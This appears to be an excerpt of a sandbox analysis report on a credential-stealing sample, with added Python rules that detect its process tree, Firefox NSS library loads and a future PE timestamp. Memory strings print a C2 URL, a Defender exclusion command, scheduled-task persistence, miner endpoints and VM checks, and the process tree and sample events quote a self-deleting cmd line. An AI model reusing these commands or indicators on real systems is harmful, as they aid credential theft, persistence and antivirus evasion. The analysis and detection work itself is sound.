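The process tree recorded above is a compact detection opportunity: RegAsm.exe (a signed .NET utility that normally registers assemblies and never spawns a shell) starts cmd.exe, which waits five seconds with timeout, deletes the RegAsm.exe image it was launched from together with every DLL in C:\ProgramData, and starts CAFIJKFHIJ.exe from the root of C:\ProgramData; meanwhile RegAsm.exe has loaded mozglue.dll, the Firefox NSS glue library the stealer drops to read browser credential stores. The following Python is an added example written for this page, not code from the sandbox vendor or the malware. It runs three rules over constructed process-creation events in the shape Sysmon Event ID 1 provides (image, parent image, command line; the PIDs 7056 and 5744 come from the report, the rest are made up) and one rule over image-load pairs in the shape of Sysmon Event ID 7.

```python
import re
from collections import defaultdict

# Constructed sample events modelled on the process tree in this report; not real telemetry.
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
SAMPLE_EVENTS = [
    {"pid": 7056, "ppid": 4120, "image": REGASM, "cmdline": f'"{REGASM}"'},
    {"pid": 6012, "ppid": 7056, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q '
                r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit'},
    {"pid": 5744, "ppid": 6012, "image": r"C:\ProgramData\CAFIJKFHIJ.exe",
     "cmdline": r'"C:\ProgramData\CAFIJKFHIJ.exe"'},
    {"pid": 6020, "ppid": 6012, "image": r"C:\Windows\SysWOW64\timeout.exe", "cmdline": "timeout /t 5"},
    # benign control: an operator clearing a log directory from an interactive shell
    {"pid": 900, "ppid": 1, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c del /q "C:\Temp\*.log"'},
]

# "wait, then delete": timeout /t N or a ping to localhost used as a sleep
DELAY_RE = re.compile(r"\b(timeout\s+/t\s+\d+|ping\s+(-n\s+\d+\s+)?127\.0\.0\.1)", re.I)
DEL_RE = re.compile(r"\bdel\b", re.I)
# an .exe sitting directly in the root of ProgramData (no vendor subdirectory)
PROGRAMDATA_ROOT_RE = re.compile(r"^[a-z]:\\programdata\\[^\\]+\.exe$", re.I)


def detect(events):
    """Return {pid: [rule, ...]} for events that match any of the three process rules."""
    by_pid = {e["pid"]: e for e in events}
    hits = defaultdict(list)
    for e in events:
        parent = by_pid.get(e["ppid"])
        image_name = e["image"].rsplit("\\", 1)[-1].lower()
        cmd = e["cmdline"]
        # Rule 1: cmd.exe delays, then deletes the image of the process that spawned it
        if (image_name == "cmd.exe" and parent and DELAY_RE.search(cmd)
                and DEL_RE.search(cmd) and parent["image"].lower() in cmd.lower()):
            hits[e["pid"]].append("delayed_self_delete")
        # Rule 2: RegAsm.exe has no business creating child processes
        if parent and parent["image"].lower().endswith("\\regasm.exe"):
            hits[e["pid"]].append("regasm_child_process")
        # Rule 3: executable launched from the root of C:\ProgramData
        if PROGRAMDATA_ROOT_RE.match(e["image"]):
            hits[e["pid"]].append("programdata_root_exe")
    return dict(hits)


# Firefox's NSS libraries: legitimate hosts are Mozilla products, a stealer loads them to decrypt logins.
NSS_MODULES = {"nss3.dll", "mozglue.dll", "softokn3.dll", "freebl3.dll"}
BROWSER_HOSTS = {"firefox.exe", "thunderbird.exe"}


def nss_loaded_by_non_browser(loads):
    """(image path, module name) pairs -> [(host exe, module)] for NSS loads outside Mozilla processes."""
    flagged = []
    for image, module in loads:
        host = image.rsplit("\\", 1)[-1].lower()
        if module.lower() in NSS_MODULES and host not in BROWSER_HOSTS:
            flagged.append((host, module.lower()))
    return flagged


if __name__ == "__main__":
    print(detect(SAMPLE_EVENTS))
    print(nss_loaded_by_non_browser([(REGASM, "mozglue.dll"),
                                     (r"C:\Program Files\Mozilla Firefox\firefox.exe", "nss3.dll")]))
```

Rule 1 keys on the parent's image path appearing inside the child's command line, so it fires on self-deletion regardless of which LOLBIN was hollowed; rule 2 is specific to RegAsm.exe and would need the same treatment for RegSvcs.exe, which the strings in this report name as an alternative host. The NSS check is the one that survives renaming: whatever process ends up holding the stealer, it has to load nss3.dll/mozglue.dll to read Firefox's logins.json.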

Data Obfuscation

Source: C:\ProgramData\CAFIJKFHIJ.exe Unpacked PE file: 9.2.CAFIJKFHIJ.exe.d00000.0.unpack .text:ER;.rsrc:R; vs Unknown_Section0:ER;Unknown_Section1:R;
Source: CAFIJKFHIJ.exe.3.dr Static PE information: 0x96C89C2F [Tue Mar 1 06:39:43 2050 UTC]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004185A0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_004185A0
Source: softokn3.dll.3.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.3.dr Static PE information: section name: .00cfg
Source: freebl3.dll.3.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.3.dr Static PE information: section name: .00cfg
Source: mozglue.dll.3.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.3.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.3.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.3.dr Static PE information: section name: .didat
Source: sqln[1].dll.3.dr Static PE information: section name: .00cfg
Source: nss3.dll.3.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.3.dr Static PE information: section name: .00cfg
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Code function: 0_2_00F9490D push ecx; ret 0_2_00F94920
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Code function: 0_2_00F61A80 push ecx; ret 0_2_00F61A93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0041A4E5 push ecx; ret 3_2_0041A4F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C82B536 push ecx; ret 3_2_6C82B549
Source: C:\ProgramData\CAFIJKFHIJ.exe Code function: 9_2_00007FFD9BAB1FAA pushfd ; ret 9_2_00007FFD9BAB1FB0
Source: C:\ProgramData\CAFIJKFHIJ.exe Code function: 9_2_00007FFD9BAB8A21 push es; iretd 9_2_00007FFD9BAB8A24
Source: C:\ProgramData\CAFIJKFHIJ.exe Code function: 9_2_00007FFD9BAB1D85 pushfd ; ret 9_2_00007FFD9BAB1D8B
Source: C:\ProgramData\CAFIJKFHIJ.exe Code function: 9_2_00007FFD9BAB8DD8 push edx; retf 9_2_00007FFD9BAB8DDB
Source: C:\ProgramData\CAFIJKFHIJ.exe Code function: 9_2_00007FFD9BAB113D pushfd ; ret 9_2_00007FFD9BAB1143
Source: C:\ProgramData\CAFIJKFHIJ.exe Code function: 9_2_00007FFD9BBF3D44 push ebx; ret 9_2_00007FFD9BBF3D4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\nss3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\CAFIJKFHIJ.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Soft123[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\softokn3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CAFIJKFHIJ.exe Process information set: NOOPENFILEERRORBOX
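
The link-time stamp reported for the dropped CAFIJKFHIJ.exe, 0x96C89C2F, decodes to 1 March 2050, decades after the sample was observed. A future stamp is a classic sign of header tampering, but CAFIJKFHIJ.exe is a managed binary (it loads mscoree.dll and mscorjit.dll, and its PDB paths name Autofac, System.Data.SQLite and the AWS SDK), and deterministic .NET builds write a content hash into this field rather than a date, so for .NET the stamp is weak evidence on its own. The Python below is an added example, not code from the page; it reads the field straight from the PE header with struct (so the check has no dependency on a PE library), converts it, and labels it against the time the sample was seen. The minimal_pe helper and the header-only image it builds are constructed for the demonstration.

```python
import struct
from datetime import datetime, timezone


def pe_timestamp(image: bytes) -> int:
    """Read IMAGE_FILE_HEADER.TimeDateStamp from the raw bytes of a PE file."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # IMAGE_FILE_HEADER follows the signature: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    return struct.unpack_from("<I", image, e_lfanew + 8)[0]


def timestamp_utc(ts: int) -> datetime:
    """TimeDateStamp is seconds since the Unix epoch, UTC."""
    return datetime.fromtimestamp(ts, tz=timezone.utc)


def classify_timestamp(ts: int, observed_at: datetime, is_dotnet: bool = False) -> str:
    """Label a link-time stamp relative to when the sample was observed."""
    if ts == 0:
        return "zeroed"
    if timestamp_utc(ts) > observed_at:
        # Deterministic .NET builds store a content hash here, so a future date alone is not
        # proof of tampering for a managed binary; for native code it usually is.
        return "future-hash" if is_dotnet else "future-tampered"
    return "plausible"


def minimal_pe(ts: int) -> bytes:
    """Constructed header-only PE, just enough for pe_timestamp(); not a loadable image."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE header directly after the DOS header
    # Machine=i386, 2 sections, the stamp under test, no symbols, 0xE0-byte optional header
    file_header = struct.pack("<HHIIIHH", 0x14C, 2, ts, 0, 0, 0xE0, 0x0102)
    return bytes(dos) + b"PE\0\0" + file_header


if __name__ == "__main__":
    ts = pe_timestamp(minimal_pe(0x96C89C2F))  # the stamp reported for CAFIJKFHIJ.exe
    print(hex(ts), timestamp_utc(ts).isoformat(),
          classify_timestamp(ts, datetime.now(timezone.utc), is_dotnet=True))
```

For a real file, pass `open(path, "rb").read()` to pe_timestamp. When triaging a .NET drop, compare the stamp with the dates in the embedded PDB paths and the version resource instead of trusting it; for the native NSS and VC runtime DLLs dropped alongside, a stamp later than the observation time is worth a second look.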

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7056, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: CAFIJKFHIJ.exe PID: 5744, type: MEMORYSTR
Source: Global behavior Junk call stats: NtWriteFile 2314752
Source: C:\ProgramData\CAFIJKFHIJ.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PortConnector WHERE PNPDeviceID IS NOT NULL
Source: C:\ProgramData\CAFIJKFHIJ.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe, RegAsm.exe Binary or memory string: DIR_WATCH.DLL
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe, RegAsm.exe, CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe, RegAsm.exe Binary or memory string: API_LOG.DLL
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLLCMDVRT32.DLLCMDVRT64.DLLSXIN.DLLCUCKOOMON.DLLKERNEL32.DLLWINE_GET_UNIX_FILE_NAMESELECT * FROM WIN32_COMPUTERSYSTEMMANUFACTURERMODELMICROSOFT CORPORATIONVIRTUALVMWAREBALLOON.NETKVM.VIOINPUTVIOFS.VIOSER.*VMBUSVMBUSHIDHYPERKBDJOHN DOEMILLERMALWARECURRENTUSERSANDBOXJOHNSONWDAGUTILITYACCOUNTVBOXMOUSE.VBOXGUEST.VBOXSF.VBOXVIDEO.VMMOUSE.VBOXOGL.DLLVMWAREORACLEVIRTUALBOX GUEST ADDITIONSVBOXSERVICEVGAUTHSERVICEVMUSRVCQEMU-GASELECT * FROM WIN32_PORTCONNECTOR WHERE PNPDEVICEID IS NOT NULLPNPDEVICEIDACPI\PNP0501ACPI\PNP0502SYSCRITICAL ERROR1POWERSHELLRUNAS -COMMAND ADD-MPPREFERENCE -EXCLUSIONPATH '{0}'ON0\SCREEN.JPGSCREEN\.JPGHASHCUM/GET.PHPPOST15SEC30SECRANDOM/ZIMA.PHP?MINE=IFELSEXMRVERUSXMR+VERUSRAVENETCVERUS+RAVENVERUS+ETCXMR+RAVENXMR+ETCAUTOABCDEFGHJKLMNOWIN32_PROCESSORPROCESSORID-WIN32_BIOSSERIALNUMBERWIN32_DISKDRIVESIGNATUREWIN32_BASEBOARDWIN32_VIDEOCONTROLLERNAMEX20X0000100X0000110X0000120X0000130X0000140X0000150X0000160X0000170X0000180X0000190X0000200X0000210X000022SELECT * FROM WIN32_PROCESSORNUMBEROFCORESPHORMMID.CROOT\CIMV2SELECT NAME FROM WIN32_PROCESSORUNKNOWN.SELECT TOTALPHYSICALMEMORY FROM WIN32_COMPUTERSYSTEMTOTALPHYSICALMEMORYMBSELECT * FROM WIN32_VIDEOCONTROLLERADAPTERRAM BYTES, CAPTION{0} | {1}AMDNVIDIAINTEL(R){1}.ROOT\SECURITYCENTERROOT\SECURITYCENTER2SELECT * FROM ANTIVIRUSPRODUCTDISPLAYNAME, NONECPUGPURAMTAGIFELSELDAV/BEEP.PHPFILEZIDBEBRIK.PHP.BAT@ECHO OFFTIMEOUT 3 > NULSTART "" ""CD DEL "" /F /QSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\C2NODGFZA3MUZXHL/CREATE /SC MINUTE /MO 3 /TN "" /TR "" /FCMD/C SCHTASKS /CREATE /F /SC MINUTE /MO 5 /RL HIGHEST /TN "/ZIMA.PHP?MINE=LOADER;YESNOSELECT COMMANDLINE FROM WIN32_PROCESS WHERE PROCESSID = 
COMMANDLINEWIN64UNINSTALL.DATMAZRICY9X3PTU2IZDRO5UXBB6/AK0/HTSOSORRY.PHPEOK.PHPTOKYO.PHPCHECK.PHPOPERAAPP.DATOPERA.DATOPERAUPDATER.DATFIREFOX.DATHELPER.DATZUHAN.EXEWINFORM.CSZUHAN1264417905PROGRAM.CSGETIQZUTSZDJUKE1BSBET3EI2ENPPHHTXRWHVRLTV+QQKRJFXZ5YF6S4CCPXUXRE4GSEXBURQY1IXBJM+H+NKKUXWDRKMSHJJWZCKO9RYTWZ/5ZDYLRQZYZKU1AQMYRJIIC5E1EA04PVRZRO/7AHRKIZQ==YBM4NNGEQQFUIWZVANWG2OKZNBNG1PG7S41+NKV0IE1YLNNXKNDZWHC9OQR3X989TOJKAX+VQZ8J9MEC90WKEDP6JF6K5I0KUS3KC3P7W5HWUIY2VYBMXLVQVOXY4HZSKF6RSY8EDB9JVHITI1OGEBE7LPINPVDCPLNO7BA9H4PUEE1OMVXIBOAXODMCNZYXH2WBLTMBMLYZIYRYS2X1W2SHQJV9MELHOEXPN0WVWTZPMNWFIT4ESVD8KBOQVN+CWZ8WPHFKNLDOXZ9XAOAXJ/WKFJNCKYYTKCLPPN6MQON47QFU6FNCRFJL0WKAJUBTHW2JI1/J5UQNJL+XNNJZXLROMYC3PN0HG+S0I2F7Y4WHXX4HTFFK4TLIGGE9IEHVQFUTXCXGEKIPB3QA29LGSG==[CHECK]HTTP://185.209.162.40/APOCALYPSERUSSIA,GEORGIA,BELARUS,ARMENIA,RUSSIA,BELARUS,AZERBAIJAN,KAZAKHSTAN,KYRGYZSTAN,ARMENIA,UZBEKISTAN,TAJIKISTAN EF+UVD02PT3LWIEMBAG5OW==ONVBC.EXE/ZIMA.PHP?MINE=XMR/ZIMA.PHP?MINE=OTHERGENERATORGENAPZXDATID=APPLICATION/X-WWW-FORM-URLENCODED//REGSVCS.EXE/ZIMA.PHP?MINE=RAVENNGEN.EXE/ZIMA.PHP?MINE=ETC
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000400000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
Source: C:\ProgramData\CAFIJKFHIJ.exe Memory allocated: 18D0000 memory reserve | memory write watch
Source: C:\ProgramData\CAFIJKFHIJ.exe Memory allocated: 1C450000 memory reserve | memory write watch
Source: C:\ProgramData\CAFIJKFHIJ.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 8.6 %
Source: C:\ProgramData\CAFIJKFHIJ.exe TID: 2488 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 3220 Thread sleep count: 43 > 30
Source: C:\ProgramData\CAFIJKFHIJ.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00410370 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 004104A2h 3_2_00410370
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Code function: 0_2_00F6A7B3 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_00F6A7B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040B030 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 3_2_0040B030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004011E0 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose, 3_2_004011E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040D320 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_0040D320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004164A0 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose, 3_2_004164A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00417550 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 3_2_00417550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040A530 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 3_2_0040A530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00416CF0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 3_2_00416CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00417140 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 3_2_00417140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040A980 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 3_2_0040A980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004168E0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen, 3_2_004168E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00410540 GetSystemInfo,wsprintfA, 3_2_00410540
Source: C:\ProgramData\CAFIJKFHIJ.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service0
Source: CAFIJKFHIJ.exe, 00000009.00000002.2069666792.000000002537B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SystemHostDiagnostic Service HostWdiServiceHostWindows Connect Now - Config RegistrarwcncsvcWindows Connection ManagerWcmsvcWindows Biometric ServiceWbioSrvcBlock Level Backup Engine ServicewbengineWarpJITSvcWarpJITSvcWalletServiceWalletServiceWindows TimeW32TimeVolume Shadow CopyVSSHyper-V Volume Shadow Copy RequestorvmicvssHyper-V PowerShell Direct ServicevmicvmsessionHyper-V Time Synchronization ServicevmictimesyncHyper-V Guest Shutdown ServicevmicshutdownHyper-V Re
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vboxservice
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmmouse.
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: -Hyper-V Remote Desktop Virtualization Service0
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VBoxMouse.
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vboxguest.sys@n
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vboxsf.sys
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmmouse.sys@n
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VBoxSF.
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service0
Source: RegAsm.exe, 00000003.00000002.2042222099.000000000161B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vboxmouse.sys
Source: RegAsm.exe, 00000003.00000002.2042222099.000000000161B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\VMware
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VBoxMouse.sys
